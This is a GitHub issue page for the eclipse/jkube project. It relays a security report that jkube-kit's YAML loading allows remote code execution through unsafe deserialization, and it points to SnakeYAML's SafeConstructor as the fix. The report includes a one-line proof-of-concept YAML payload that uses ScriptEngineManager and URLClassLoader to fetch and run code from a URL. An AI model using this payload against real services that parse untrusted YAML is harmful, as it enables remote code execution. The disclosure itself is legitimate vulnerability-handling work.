Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bug 561261 - jkube-kit - insecure yaml load leading to RCE (CWE-502) #122

Closed
manusa opened this issue Mar 26, 2020 · 0 comments
Closed

Bug 561261 - jkube-kit - insecure yaml load leading to RCE (CWE-502) #122

manusa opened this issue Mar 26, 2020 · 0 comments
Assignees
@manusa
Projects
Sprint #181

Comments

@manusa
Copy link
Member

manusa commented Mar 26, 2020

Description

Proxy issue for https://bugs.eclipse.org/bugs/show_bug.cgi?id=561261

From the Security Team Inbox:

--
https://github.com/eclipse/jkube/blob/master/jkube-kit/common/src/main/java/org/eclipse/jkube/kit/common/util/YamlUtil.java#L112 uses insecure way to construct Yaml Object leading to remote code execution. Here is a sample code which would invoke malicious code hosted in localhost:9000.

String code = "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";
YamlUtil.getPropertiesFromYamlString(code);

Please refer SafeConstructor() and https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-restrict-classes-to-be-loaded on using the api securely.

Reference: https://cwe.mitre.org/data/definitions/502.html
--

There's help for managing vulnerabilities in the handbook.

https://www.eclipse.org/projects/handbook/#vulnerability
@manusa manusa self-assigned this Mar 26, 2020
@manusa manusa added this to Planned in Sprint #181 Mar 26, 2020
@manusa manusa moved this from Planned to In Progress in Sprint #181 Mar 26, 2020
@manusa manusa mentioned this issue Mar 26, 2020
Merged
@manusa manusa moved this from In Progress to Review in Sprint #181 Mar 26, 2020
@manusa manusa closed this as completed Mar 26, 2020
@manusa manusa moved this from Review to Done in Sprint #181 Mar 26, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@manusa manusa

Labels
None yet
Projects
No open projects
Sprint #181
  
Done
Milestone
No milestone
Development

No branches or pull requests
1 participant
@manusa